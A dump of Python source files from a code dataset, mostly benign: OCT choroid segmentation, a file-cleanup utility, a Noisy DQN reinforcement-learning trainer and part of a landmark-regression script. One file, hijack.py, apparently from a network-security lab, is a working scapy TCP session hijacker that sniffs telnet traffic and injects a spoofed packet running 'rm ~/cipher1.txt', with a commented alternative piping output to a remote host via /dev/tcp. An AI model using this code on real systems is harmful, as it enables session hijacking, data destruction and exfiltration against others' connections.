through each column.\n for iop in range(AA.shape[0]):\n \n #Find the coordinates in each column.\n ao = AA[iop,:]\n zz = np.where(ao > 0)\n \n if np.shape(zz) != (1,0):\n \n OO[iop,0] = zz[0][-1]\n \n #Fill in holes and smooth.\n replaceNaNValues(OO)\n laydownii = lowess(OO[:,0], list(range(AA.shape[0])), 0.25, is_sorted=True, missing='drop', return_sorted=False)\n \n #Up-scale and format the BM and final choroid segmentations.\n BMM = interpo*BMM+1\n laydownii = interpo*laydownii+1\n\n x = list(range(1536))\n \n BMM_one_to_one = np.zeros(1536)\n BMM_one_to_one[:] = np.NaN\n BMM_one_to_one[::2] = BMM\n replaceNaNValues(BMM_one_to_one)\n CHR_top = np.zeros((1536,2))\n CHR_top[:,0] = x\n CHR_top[:,1] = BMM_one_to_one\n \n laydownii_one_to_one = np.zeros(1536)\n laydownii_one_to_one[:] = np.NaN\n laydownii_one_to_one[::2] = laydownii\n replaceNaNValues(laydownii_one_to_one)\n CHR_bottom = np.zeros((1536,2))\n CHR_bottom[:,0] = x\n CHR_bottom[:,1] = laydownii_one_to_one\n \n return CHR_top, CHR_bottom\n\ndef compute_choroid_mean_depth(CHR_top, CHR_bot, pixel2micron_constant):\n '''\n Compute the mean depth of the choroid from the segmentation file.\n \n @param CHR_top: The array of points comprising the upper boundary of the \n choroid.\n @param CHR_bot: The array of points comprising the lower boundary of the \n choroid.\n \n @return: CHR_mean_depth, a float representing the mean depth of the \n entire choroid from the bottom of the Bruche's Membrane.\n '''\n \n CHR_diff = CHR_bot[:,1] - CHR_top[:,1]\n CHR_mean_depth = np.nanmean(CHR_diff) * pixel2micron_constant\n print(str(CHR_mean_depth) + ' ums')\n \n return CHR_mean_depth\n\ndef segment_and_measure_choroid_CIRCLE(vol_path, FLEX=False):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation of the \n global mean depth of the choroid.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n @param FLEX: True if scan has dimensions 768x496x1 (a FLEX machine scan).\n \n @return: CHR_top, segmentation representing the top of the choroid; \n CHR_bottom, segmentation representing the bottom of the choroid; \n CHR_mean_depth, float representing the global mean depth of the \n choroid.\n '''\n \n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME'][0]\n bscan = allB['BSCAN']\n He_segs = allB['SegArray']\n BMM = He_segs[1]\n \n if FLEX:\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscan = resized_bscan\n BMM = resized_BMM\n \n CHR_top, CHR_bottom = findchrv10(bscan, BMM)\n \n if FLEX:\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1]\n \n else:\n\n CHR = copy.copy(CHR_bottom)\n BM = copy.copy(CHR_top)\n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n \n return CHR_top, CHR_bottom, CHR_mean_depth\n\ndef segment_and_measure_choroid_ONHRC(vol_path):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation \n of the global mean depth of the choroid performed on circle bscans found \n in ONH-RC scans.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n \n @return: CHR_tops, segmentations representing the top of the choroid; \n CHR_bottoms, segmentations representing the bottom of the choroid; \n CHR_mean_depths, floats representing the global mean depth of the \n choroid.\n '''\n\n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME'][24:]\n \n bscans = []\n CHR_tops = []\n CHR_bottoms = []\n CHR_mean_depths = []\n \n for B in allB:\n \n bscan = B['BSCAN']\n He_segs = B['SegArray']\n BMM = He_segs[1]\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscans.append(resized_bscan)\n \n CHR_top, CHR_bottom = findchrv10(resized_bscan, resized_BMM)\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1]\n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n CHR_tops.append(BM)\n CHR_bottoms.append(CHR)\n \n pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n CHR_mean_depths.append(CHR_mean_depth)\n \n return CHR_tops, CHR_bottoms, CHR_mean_depths\n\ndef segment_and_measure_choroid_MAC(vol_path):\n '''\n A wrapper for the choroid segmentation algorithm and for the calculation \n of the global mean depth of the choroid performed on macula cube scans.\n \n @param vol_path: Absolute path to the volume scan being segmented.\n \n @return: CHR_tops, segmentations representing the top of the choroid; \n CHR_bottoms, segmentations representing the bottom of the choroid; \n CHR_mean_depths, floats representing the global mean depth of the \n choroid.\n '''\n \n vol_data = spectools.readSpectralisData(vol_path)\n allB = vol_data['VOLUME']\n \n bscans = []\n CHR_tops = []\n CHR_bottoms = []\n CHR_mean_depths = []\n b = 0\n \n for B in allB:\n \n b += 1\n print(\"CHR: Working on bscan %i...\" % b)\n bscan = B['BSCAN']\n He_segs = B['SegArray']\n BMM = He_segs[1]\n \n #Resize to adapt to the choroid segmentation algorithm.\n resized_bscan = cv2.resize(bscan, None, fx=2, fy=1, interpolation=cv2.INTER_CUBIC)\n \n resized_BMM = np.zeros((1536,))\n resized_BMM[:] = np.NaN\n resized_BMM[::2] = BMM\n resized_BMM = replaceNaNValues(resized_BMM)\n \n bscans.append(resized_bscan)\n \n CHR_top, CHR_bottom = findchrv10(resized_bscan, resized_BMM)\n \n # Resize to original dimensions.\n CHR = np.zeros((768,2))\n BM = np.zeros((768,2))\n CHR[:,0] = list(range(768))\n BM[:,0] = list(range(768))\n CHR[:,1] = CHR_bottom[::2,1]\n BM[:,1] = CHR_top[::2,1] \n \n # Clamp to below BM and NaN-ize unsegmented columns.\n diff = CHR[:,1] - BM[:,1]\n negs = np.where(diff < 0)\n \n large_BM = np.where(BM[:,1] >= 496)\n large_CHR = np.where(CHR[:,1] >= 496)\n \n if np.shape(negs)[1] > 0:\n \n CHR[negs,1] = BM[negs,1]\n \n if np.shape(large_BM)[1] > 0 or np.shape(large_CHR)[1] > 0:\n \n BM[large_BM,1] = np.NaN\n CHR[large_CHR,1] = np.NaN\n \n CHR_tops.append(BM)\n CHR_bottoms.append(CHR)\n \n pixel2micron_constant = float(vol_data['ScaleZ']) * 1000\n CHR_mean_depth = compute_choroid_mean_depth(BM, CHR, pixel2micron_constant)\n CHR_mean_depths.append(CHR_mean_depth)\n \n return CHR_tops, CHR_bottoms, CHR_mean_depths\n\ndef segment_CHR(vol_path):\n '''\n Performs segmentation of the choroid on the VOLUME data from a Spectralis \n circle scan at vol_path or the circle scans from a ONH-RC radial scan at \n vol_path.\n \n @param vol_path: A Spectralis ONH-RC radial scan or circle scan volume \n export path.\n \n @return: CHR_top(s), CHR_bottom(s), and CHR_mean_depth(s), the raw segmentation \n output data parametrizing the choroid segmentation.\n '''\n \n vol_data = spectools.readSpectralisMetadata(vol_path)\n \n if (vol_data['SIZEX'] == 1536 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 1):\n \n CHR_top, CHR_bottom, CHR_mean_depth = segment_and_measure_choroid_CIRCLE(vol_path)\n return CHR_top, CHR_bottom, CHR_mean_depth\n\n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 27):\n\n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_ONHRC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 1):\n \n CHR_top, CHR_bottom, CHR_mean_depth = segment_and_measure_choroid_CIRCLE(vol_path, FLEX=True)\n return CHR_top, CHR_bottom, CHR_mean_depth\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 73):\n \n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_MAC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n elif (vol_data['SIZEX'] == 768 \n and vol_data['SIZEZ'] == 496 \n and vol_data['NBSCAN'] == 121):\n \n CHR_tops, CHR_bottoms, CHR_mean_depths = segment_and_measure_choroid_MAC(vol_path)\n return CHR_tops, CHR_bottoms, CHR_mean_depths\n \n else:\n \n return None\n\ndef export_CHR_segmentation_to_csv(CHR, out_dir):\n '''\n Writes the choroid segmentation to CHR_csv_path.\n \n @param CHR: The choroid segmentation.\n @param CHR_csv_path: Absolute path to the output csv.\n \n @return: None.\n '''\n \n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'CHR.csv'), 'w') as csvfile:\n \n csvwriter = csv.writer(csvfile)\n \n header = ['Column']\n header.extend(list(map(str, list(range(CHR.shape[0])))))\n csvwriter.writerow(header)\n \n row = ['Choroid']\n row.extend(list(map(str, CHR[:,1])))\n csvwriter.writerow(row)\n \n return None\n\ndef import_CHR_segmentation_from_csv(CHR_csv_path):\n '''\n Generates a 1536x2 numpy array of choroid points from a csv export of the choroid\n segmentation found at CHR_csv_path.\n \n @param CHR_csv_path: Absolute path to a choroid csv export.\n \n @return: CHR, a 1536x2 numpy array of CHR points.\n '''\n \n csvfile = open(CHR_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR0 = list(map(int, next(reader, None)[1:]))\n CHR1 = list(map(float, next(reader, None)[1:]))\n CHR = np.zeros((len(CHR0), 2))\n CHR[:,0] = CHR0\n CHR[:,1] = CHR1\n \n return CHR\n\ndef export_BM_Spectralis_segmentation_to_csv(BM_Spectralis, out_dir):\n '''\n Writes a BM segmentation to csv file at BM_csv_path.\n \n @param BM_Spectralis: The BM segmentation from a Spectralis volume.\n @param BM_csv_path: Absolute path to the output csv.\n \n @return: None.\n '''\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'BM_Spec.csv'), 'w') as csvfile:\n \n csvwriter = csv.writer(csvfile)\n \n header = ['Column']\n header.extend(list(map(str, list(range(BM_Spectralis.shape[0])))))\n csvwriter.writerow(header)\n \n row = ['BM_Spectralis']\n row.extend(list(map(str, BM_Spectralis[:,1])))\n csvwriter.writerow(row)\n \n return None\n\ndef import_BM_Spectralis_segmentation_from_csv(BM_csv_path):\n '''\n Generates a 1536x2 numpy array of BM points from a csv export of the BM \n Spectralis segmentation as a csv file found at BM_csv_path.\n \n @param BM_csv_path: Absolute path to a BM Spectralis csv export.\n \n @return: BM_Spectralis, a 1536x2 numpy array of BM points.\n '''\n \n csvfile = open(BM_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR0 = list(map(int, next(reader, None)[1:]))\n CHR1 = list(map(float, next(reader, None)[1:]))\n CHR = np.zeros((len(CHR0), 2))\n CHR[:,0] = CHR0\n CHR[:,1] = CHR1\n \n return CHR\n\ndef export_CHR_depth_to_csv(CHR_depth, out_dir):\n '''\n Generates a csv file containing the choroid mean depth CHR_depth.\n \n @param CHR_depth: The choroid mean depth as a float in microns.\n @param out_dir: The destination directory.\n \n @return: None.\n '''\n \n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n \n with open(os.path.join(out_dir, 'CHR_depth.csv'), 'w') as csvfile:\n \n writer = csv.writer(csvfile)\n \n row = ['Choroid Global Mean Depth (ums)', '{:.3f}'.format(float(CHR_depth))]\n writer.writerow(row)\n \n return None\n\ndef import_CHR_depth_from_csv(CHR_depth_csv_path):\n '''\n Reads the CHR_depth value from its csv export.\n \n @param CHR_depth_csv_path: Absolute path to a CHR_depth csv export.\n \n @return: CHR_depth, a float in microns.\n '''\n \n csvfile = open(CHR_depth_csv_path, 'r')\n reader = csv.reader(csvfile)\n CHR_depth = float(next(reader)[1])\n \n return CHR_depth\n\ndef segment_and_export_CHR(vol_path, out_dir, draw=False):\n '''\n Runs the choroid segmentation algorithm on a volume scan at vol_path and \n saves the output to out_dir. Includes annotated bscans if draw == True.\n \n @param vol_path: Path to a Spectralis volume. Must be ONH-RC or CIRCLE.\n @param out_dir: Path to save output to.\n @param draw: If draw == True, draw the choroid on the circle scan and save.\n \n @return: None.\n '''\n \n metadata = spectools.readSpectralisMetadata(vol_path)\n scan_type = preprocess.find_scan_type(metadata)\n CHRt, CHRb, CHRmd = segment_CHR(vol_path)\n \n if scan_type == 'CIRCLE01' or scan_type == 'CIRCLE01-FLEX':\n \n #Save the output.\n export_BM_Spectralis_segmentation_to_csv(CHRt, out_dir)\n export_CHR_segmentation_to_csv(CHRb, out_dir)\n export_CHR_depth_to_csv(CHRmd, out_dir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n bscan = volume[0]\n #plottools.draw.draw_choroid(bscan, CHRt, CHRb, out_dir)\n \n elif scan_type == 'ONH27-RC':\n \n out_subdirs = [os.path.join(out_dir, 'bscan-{}'.format(i)) for i in range(25,28)]\n \n for i, out_subdir in enumerate(out_subdirs):\n\n if not os.path.exists(out_subdir):\n \n os.makedirs(out_subdir)\n \n #Save output.\n export_BM_Spectralis_segmentation_to_csv(CHRt[i], out_subdir)\n export_CHR_segmentation_to_csv(CHRb[i], out_subdir)\n export_CHR_depth_to_csv(CHRmd[i], out_subdir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n \n for b in range(24,27):\n \n bscan = volume[b]\n #plottools.draw.draw_choroid(bscan, CHRt[24-b], CHRb[24-b], out_subdirs[24-b], ONHRC=True)\n \n elif scan_type == '121-CUBE' or scan_type == '73-CUBE':\n \n B = metadata['NBSCAN']\n out_subdirs = [os.path.join(out_dir, 'bscan-{}'.format(i)) for i in range(1,B+1)]\n \n for i, out_subdir in enumerate(out_subdirs):\n\n if not os.path.exists(out_subdir):\n \n os.makedirs(out_subdir)\n \n #Save output.\n export_BM_Spectralis_segmentation_to_csv(CHRt[i], out_subdir)\n export_CHR_segmentation_to_csv(CHRb[i], out_subdir)\n export_CHR_depth_to_csv(CHRmd[i], out_subdir)\n \n if draw:\n \n vol_data = spectools.readSpectralisData(vol_path)\n volume = vol_data['VOLUME']\n \n for b in range(B):\n \n bscan = volume[b]\n #draw.draw_choroid(bscan, CHRt[b], CHRb[b], out_subdirs[b], ONHRC=True)\n \n return None\n\ndef segment_and_export_many_CHR(vols_dir, out_dir, draw=False):\n '''\n Runs the choroid segmentation algorithm on every volume scan in a directory \n of volumes vols_dir and saves output in out_dir. Includes annotated bscans \n if draw == True.\n \n @param vols_dir: Absolute path to a text file of paths to circle scan volumes.\n @param out_dir: Directory where output will be saved.\n @param draw: If draw == True, draw the choroid upon the circle scans and save.\n \n @return: None\n '''\n \n vol_paths = [os.path.join(vols_dir, vol) for vol in os.listdir(vols_dir) \n if vol.endswith('.vol')]\n \n misses = []\n miscount = 0\n count = 0\n\n for vol_path in vol_paths: \n \n try:\n \n segment_and_export_CHR(vol_path, out_dir, draw)\n \n count += 1\n print('%i done.' % count)\n\n except Exception as exc:\n \n miscount += 1\n \n try:\n \n misses.append(vol_path)\n \n except:\n \n pass\n \n print(\"Failed to process %d\" % (miscount))\n print(exc)\n continue\n \n print('Failed segmentations: %i' % miscount)\n print(misses)\n \n return None\n\ndef main():\n \n return None\n \nif __name__ == '__main__':\n \n main()","sub_path":"src/shileyipp/salsatools/choroid.py","file_name":"choroid.py","file_ext":"py","file_size_in_byte":33784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"605937903","text":"#!/usr/bin/python\n\nfrom scapy.all import *\n\n# remove duplication\n# {\"dest ip\":times}\ndest_record = {}\n\n\ndef do_hijack(pkt):\n key = pkt[IP].dst\n if key not in dest_record: # freshman\n dest_record[key] = 0\n return\n else:\n if dest_record[key] < 0: # prior victim\n return\n if dest_record[key] <= 50: # wait for logging\n dest_record[key] += 1\n # print(dest_record[key])\n return\n if 4*pkt[IP].ihl+4*pkt[TCP].dataofs != pkt[IP].len: # exist content\n # print(pkt[IP].ihl, pkt[TCP].dataofs, pkt[IP].len)\n return\n else:\n dest_record[key] = -1 # attack\n\n ip = IP(id=pkt[IP].id+1, src=pkt[IP].src, dst=pkt[IP].dst)\n tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport,\n seq=pkt[TCP].seq, ack=pkt[TCP].ack, flags=0x18)\n raw = Raw(load='\\r\\nrm ~/cipher1.txt\\r\\n')\n # raw = Raw(load='\\r\\nls /usr/bin/ > /dev/tcp/10.0.2.5/9090\\r\\n')\n pkt = ip/tcp/raw\n # ls(pkt)\n send(pkt, verbose=0)\n print('attacked', key)\n\n\npkt = sniff(filter='dst port 23', prn=do_hijack)\n","sub_path":"tcp_attacks/task4/hijack.py","file_name":"hijack.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175080490","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\ndef getFileName(path):\n ''' 获取指定目录下的所有指定后缀的文件名 '''\n imgpath = os.path.join(path, \"image\")\n xmlpath = os.path.join(path, \"xml\")\n imglist = os.listdir(imgpath)\n xmllist = os.listdir(xmlpath)\n # print f_list\n print(len(imglist))\n print(len(xmllist))\n a = []\n b = []\n c = []\n for i in imglist:\n # os.path.splitext():分离文件名与扩展名\n if os.path.splitext(i)[1] == '.bmp':\n a.append(os.path.splitext(i)[0])\n #print(a)\n print(len(a))\n for i in xmllist:\n # os.path.splitext():分离文件名与扩展名\n if os.path.splitext(i)[1] == '.xml':\n #print(os.path.splitext(i)[0])\n b.append(os.path.splitext(i)[0])\n elif os.path.splitext(i)[1] != '.xml':\n rpath = os.path.join(xmlpath, i)\n os.remove(rpath)\n print(len(b))\n for k in a:\n if k not in b:\n #print(k)\n filename = str(k) + \".bmp\"\n print(filename)\n revdir = os.path.join(imgpath, filename)\n os.remove(revdir)\n c.append(k)\n print(len(c))\n for m in b:\n if m not in a:\n print(m)\n fname = str(m)+\".xml\"\n rdir = os.path.join(xmlpath,fname)\n os.remove(rdir)\nif __name__ == '__main__':\n path = 'D:/jinkeimg/ng'\n getFileName(path)","sub_path":"difbmporxml.py","file_name":"difbmporxml.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"70725928","text":"import numpy as np\n\nfrom utils import *\nfrom logx import *\nimport torch\nimport torch.nn.functional as F\nfrom copy import deepcopy\nimport torch\nfrom torch.optim import Adam\nimport gym\nimport time\n\nclass NoisyDQN():\n def __init__(\n self, \n env_fn, target_update,\n dqn = NoisyNetwork, seed=0, \n steps_per_epoch=600, \n epochs=100, replay_size=int(1e5), \n gamma=0.99, q_lr=1e-3, \n batch_size=32, start_steps=200, \n update_after=200, num_test_episodes=5, \n max_ep_len=200, logger_kwargs=dict(), \n save_freq=10\n ):\n\n # Instantiate environment\n self.env, self.test_env = env_fn(), env_fn()\n\n # device: cpu / gpu\n self.device = torch.device(\n \"cuda\" if torch.cuda.is_available() else \"cpu\"\n )\n print(self.device)\n\n self.obs_dim = self.env.observation_space.shape[0]\n self.act_dim = self.env.action_space.n\n \n # Create dqn module\n self.dqn = dqn(self.obs_dim, self.act_dim).to(self.device)\n self.dqn_targ = deepcopy(self.dqn)\n # Freeze target networks with respect to optimizers\n for p in self.dqn_targ.parameters():\n p.requires_grad = False\n\n self.seed = seed\n self.steps_per_epoch = steps_per_epoch\n self.epochs = epochs\n self.gamma = gamma\n self.batch_size = batch_size\n self.start_steps = start_steps\n self.update_after = update_after\n self.num_test_episodes = num_test_episodes\n self.max_ep_len = max_ep_len\n self.save_freq = save_freq\n self.target_update = target_update\n\n # Set up logger and save configuration\n self.logger = EpochLogger(**logger_kwargs)\n self.logger.save_config(locals())\n\n # Count variables\n var_counts = tuple(count_vars(module) for module in [self.dqn])\n self.logger.log('\\nNumber of parameters: \\t pi: %d\\n'%var_counts)\n\n self.replay_buffer = OffPolicyBuffer(self.obs_dim, 1, replay_size)\n\n # Set up optimizers for value function\n self.q_optimizer = Adam(self.dqn.parameters(), lr=q_lr)\n\n # Set up model saving\n self.logger.setup_pytorch_saver(self.dqn)\n\n # Set up function for computing Q-loss\n def compute_loss_q(self, data):\n # tensor to cuda\n o, a, o2= data['obs'].to(self.device), data['act'].to(self.device), data['obs2'].to(self.device)\n r, d = data['rew'].to(self.device), data['done'].to(self.device)\n q = self.dqn(o).gather(1, a)\n next_q = self.dqn_targ(o2).max(dim=1, keepdim=True)[0].detach()\n target = (r + self.gamma * (1 - d) * next_q).to(self.device)\n\n # calculate dqn loss\n loss_q = F.smooth_l1_loss(q, target)\n\n # Useful info for logging\n loss_info = dict(QVals=q.detach().cpu().numpy())\n\n return loss_q, loss_info\n\n def update(self, data):\n # run one gradient descent step for Q.\n loss_q, loss_info = self.compute_loss_q(data)\n self.q_optimizer.zero_grad()\n loss_q.backward()\n self.q_optimizer.step()\n\n # !!! NoisyNet: reset noise\n self.dqn.reset_noise()\n self.dqn_targ.reset_noise()\n\n # Record things\n self.logger.store(LossQ=loss_q.item(), **loss_info)\n\n def get_action(self, o):\n \"\"\"Select an action from the input state.\"\"\"\n # Use the NoisyNetwork directly \n a = self.dqn(\n torch.FloatTensor(o).to(self.device)\n ).argmax()\n a = a.detach().cpu().numpy()\n \n return a\n \n def test_agent(self):\n \"\"\"Test the agent.\"\"\"\n for _ in range(self.num_test_episodes):\n o, d, ep_ret, ep_len = self.test_env.reset(), False, 0, 0\n while not(d or (ep_len == self.max_ep_len)):\n o, r, d, _ = self.test_env.step(self.get_action(o))\n ep_ret += r\n ep_len += 1\n self.logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)\n \n def target_hard_update(self):\n self.dqn_targ = deepcopy(self.dqn)\n\n def train(self):\n \n # Random seed\n torch.manual_seed(self.seed)\n np.random.seed(self.seed)\n self.env.seed(self.seed)\n \n # Prepare for interaction with environment\n total_steps = self.steps_per_epoch * self.epochs\n start_time = time.time()\n o, ep_ret, ep_len = self.env.reset(), 0, 0\n update_cnt = 0\n\n # Main loop: collect experience in env and update/log each epoch\n for t in range(total_steps):\n \n # Until start_steps have elapsed, randomly sample actions\n # from a uniform distribution for better exploration. Afterwards, \n # use the learned policy. \n if t > self.start_steps:\n a = self.get_action(o)\n else:\n a = self.env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = self.env.step(a)\n ep_ret += r\n ep_len += 1\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n d = False if ep_len==self.max_ep_len else d\n\n # Store experience to replay buffer\n self.replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of trajectory handling\n if d or (ep_len == self.max_ep_len):\n self.logger.store(EpRet=ep_ret, EpLen=ep_len)\n o, ep_ret, ep_len = self.env.reset(), 0, 0\n\n # Update handling\n if t >= self.update_after:\n batch = self.replay_buffer.sample_batch(self.batch_size)\n self.update(data=batch)\n update_cnt += 1\n \n # if hard update is needed\n if update_cnt % self.target_update == 0:\n self.target_hard_update()\n\n # End of epoch handling\n if (t+1) % self.steps_per_epoch == 0:\n epoch = (t+1) // self.steps_per_epoch\n # Save model\n if (epoch % self.save_freq == 0) or (epoch == self.epochs):\n self.logger.save_state({'env': self.env}, None)\n \n # Test the performance of the deterministic version of the agent.\n self.test_agent()\n # Log info about epoch\n self.logger.log_tabular('Epoch', epoch)\n self.logger.log_tabular('EpRet', with_min_and_max=True)\n self.logger.log_tabular('TestEpRet', with_min_and_max=True)\n self.logger.log_tabular('EpLen', average_only=True)\n self.logger.log_tabular('TestEpLen', average_only=True)\n self.logger.log_tabular('TotalEnvInteracts', t)\n self.logger.log_tabular('QVals', with_min_and_max=True)\n self.logger.log_tabular('LossQ', average_only=True)\n self.logger.log_tabular('Time', time.time()-start_time)\n self.logger.dump_tabular()\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='CartPole-v0')\n parser.add_argument('--target_update', type=int, default=100)\n parser.add_argument('--epsilon_decay', type=float, default=1 / 2000)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--seed', '-s', type=int, default=30)\n parser.add_argument('--epochs', type=int, default=100)\n parser.add_argument('--exp_name', type=str, default='CartPole-v0_dqn_noisy')\n args = parser.parse_args()\n\n from logx import setup_logger_kwargs\n logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)\n\n agent = NoisyDQN(lambda : gym.make(args.env), target_update=args.target_update, \n dqn=NoisyNetwork, seed=args.seed, logger_kwargs=logger_kwargs,\n epochs=args.epochs, gamma=args.gamma,steps_per_epoch=600, max_ep_len=200)\n agent.train()","sub_path":"rainbow/noisy_dqn.py","file_name":"noisy_dqn.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359150343","text":"from CRNet import CoordRegressionNetwork\nfrom torch import optim\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport scipy.misc\nimport torch\nimport dsntnn\nimport traf_data\nimport cv2\nimport os\nimport numpy as np\nimport logging\nimport platform\nfrom tensorboardX import SummaryWriter\n\nimage_size = [800, 450]\nif platform.system() =='Windows':\n train_path = \"D:\\Download\\\\traf\"\nelse:\n train_path = \"/home/asprohy/data/traffic\"\n# raccoon_face = scipy.misc.imresize(scipy.misc.face()[200:400, 600:800, :], image_size)\n\n# eye_x, eye_y = 24, 26 # label\n#\n# plt.imshow(raccoon_face)\n# plt.scatter([eye_x], [eye_y], color='red', marker='X')\n# plt.show()\n\nlogging.basicConfig(filename='fastrcnnTraf29.log',level=logging.DEBUG)\ntrain_data,_,_ = traf_data.get_data2(train_path)\ndatatype = 'traf'\nmodel_PATH = 'traf_dsntnn29.pt'\n\n# data = train_data\n# img_all = []\n# label_all = []\n# img_label = {}\n# for c in data:\n# img = cv2.imread(os.path.join(train_path, c[0]))\n# h,w = img.shape[:2]\n# img = cv2.resize(img, image_size)\n# label_all.append([int(c[1]/w*image_size[0]), int(c[2]/h*image_size[1])])\n# img = np.array(img)\n# img_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n# img_label[c[0]]={}\n# img_label[c[0]]['filepath'] = os.path.join(train_path, c[0])\n\nimg_all = []\nlabel_all = []\n# count = 0\n# if datatype == 'traf':\n# for c in train_data:\n# img = cv2.imread(os.path.join(train_path, c['filepath']))\n# h,w = img.shape[:2]\n# img = cv2.resize(img, image_size)\n# img = np.array(img)\n# img_tensor = torch.from_numpy(img).permute(2, 0, 1).float()\n# tmpc = c['bboxes'][0]\n#\n# label_all.append([int((tmpc['x1']+tmpc['x2']) / w * image_size[0]), int((tmpc['y1']+tmpc['y2']) / h * image_size[1])])\n#\n# img_all.append(img_tensor)\n# count += 1\n# else:\n# print('dataLoading is error')\n\n\n#\n# raccoon_face_tensor = img_all.permute(2, 0, 1).float()\n# input_tensor = raccoon_face_tensor.div(255).unsqueeze(0)\n# input_var = Variable(input_tensor, requires_grad=False)\n#\n# eye_coords_tensor = torch.Tensor([label_all])\n# target_tensor = (eye_coords_tensor * 2 + 1) / torch.Tensor(image_size) - 1\n# target_var = Variable(target_tensor, requires_grad=False)\n#\n# print('Target: {:0.4f}, {:0.4f}'.format(*list(target_tensor.squeeze())))\n#\n#\n# model = CoordRegressionNetwork(n_locations=1)\n#\n# coords, heatmaps = model(input_var)\n#\n# print('Initial prediction: {:0.4f}, {:0.4f}'.format(*list(coords.data[0, 0])))\n# plt.imshow(heatmaps[0, 0].data.cpu().numpy())\n# plt.show()\n#\n# optimizer = optim.RMSprop(model.parameters(), lr=2.5e-4)\n# epoch_num = 200\n# for c in epoch_num:\n# # for i in train_data:\n# # Forward pass\n# coords, heatmaps = model(input_var)\n#\n# # Per-location euclidean losses\n# euc_losses = 